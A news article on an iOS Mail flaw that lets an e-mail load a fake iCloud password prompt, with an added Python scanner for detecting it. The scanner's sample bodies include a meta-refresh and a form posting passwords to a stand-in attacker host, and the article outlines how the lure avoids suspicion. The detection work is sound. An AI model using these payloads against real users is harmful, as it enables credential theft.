A security researcher has published attack code that he says makes it easy to
steal the iCloud passwords of people running the latest version of Apple’s iOS.
The proof-of-concept attack exploits a flaw in Mail, the default e-mail app for
iOS. Since version 8.3 was released in April, the app has failed to block
incoming HTML that can be dangerous. The trap is sprung when a message is
opened: the message fetches a form from a remote server that closely resembles
the genuine iCloud log-in prompt.
“This bug allows remote HTML content to be loaded, replacing the content of the
original e-mail message,” a user with the GitHub name jansoucek wrote in a
readme file accompanying the exploit. “JavaScript is disabled in this
UIWebView, but it is still possible to build a functional password ‘collector’
using simple HTML and CSS.”
To reduce suspicion that anything is amiss, the message can be programmed to
show the password window only once, instead of every time the fake message is
viewed. To make it look more like Apple’s authentic iOS prompt, it uses a
feature known as autofocus to hide the dialog field once the user taps OK. All
that is required to launch the attack is an e-mail containing the <meta
http-equiv=refresh> HTML tag sent to the target, and a server hosting the fake
log-in window. The fake prompt is then rendered inside the e-mail body in a way
that can easily fool anyone.
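The practical check on the receiving side is to inspect HTML mail bodies for the trigger the article names. The scanner below is an added example written for this page, not code from the researcher's proof of concept: it flags any <meta http-equiv=refresh> tag (reporting the URL it would redirect to) and, as a second heuristic, any form that posts to a remote host, with password fields called out separately. The sample messages and the hostnames in them are constructed for the example.

```python
"""Scan an HTML e-mail body for the meta-refresh redirect and remote
password forms described above. Added example; not the original PoC.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _Scanner(HTMLParser):
    """Collects (kind, url) findings while walking the HTML."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._form_action = None      # action of the <form> currently open
        self._form_has_password = False

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases attribute names; values may be None (e.g. "autofocus").
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", _refresh_target(a.get("content", ""))))
        elif tag == "form":
            self._form_action = a.get("action", "")
            self._form_has_password = False
        elif tag == "input" and a.get("type", "").lower() == "password":
            self._form_has_password = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form_action is not None:
            # Only a form with an absolute URL can post the data to another host.
            if urlparse(self._form_action).netloc:
                kind = "remote-password-form" if self._form_has_password else "remote-form"
                self.findings.append((kind, self._form_action))
            self._form_action = None


def _refresh_target(content):
    """Extract the URL from a refresh content value such as '0; url=https://...'."""
    parts = content.split(";", 1)
    if len(parts) == 2:
        rest = parts[1].strip()
        if rest.lower().startswith("url="):
            return rest[4:].strip().strip("'\"")
    return ""


def scan_html_email(html):
    """Return a list of (kind, url) findings for an HTML message body."""
    s = _Scanner()
    s.feed(html)
    s.close()
    return s.findings


def is_suspicious(html):
    """True when the body carries a meta refresh or a remote password form."""
    return any(kind in ("meta-refresh", "remote-password-form")
               for kind, _ in scan_html_email(html))


# Constructed sample bodies for this example; hostnames are placeholders.
MALICIOUS_EMAIL = """<html><head>
<meta http-equiv="refresh" content="0; url=https://attacker.example/icloud-prompt.html">
</head><body><p>Your iCloud storage is almost full.</p></body></html>"""

BENIGN_EMAIL = """<html><body><p>Hi, see you at 10.</p>
<img src="https://cdn.example/logo.png"></body></html>"""

INLINE_FORM_EMAIL = """<html><body>
<form action="https://attacker.example/collect" method="post">
<input type="text" name="user"><input type="password" name="pw" autofocus>
<input type="submit" value="OK"></form></body></html>"""

if __name__ == "__main__":
    for name, body in [("malicious", MALICIOUS_EMAIL), ("benign", BENIGN_EMAIL),
                       ("inline-form", INLINE_FORM_EMAIL)]:
        print(name, is_suspicious(body), scan_html_email(body))
```

A meta refresh has no legitimate use in an e-mail body, so the first finding alone is enough to quarantine or at least strip the tag; the form heuristic covers the variant where the collector is inlined rather than fetched.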
Experienced users can detect the fake password window by pressing the home
button while the prompt is displayed. Authentic prompts are “modal,” meaning
they do not let the user do anything else until the OK or Cancel button is
tapped; the fake prompt is not. If pressing the home button while the prompt is
showing returns you to the home screen, the prompt is fake and should not be
trusted.
The researcher said he reported the bug to Apple in January, but Apple has
still not provided a fix; Apple has yet to comment on the vulnerability.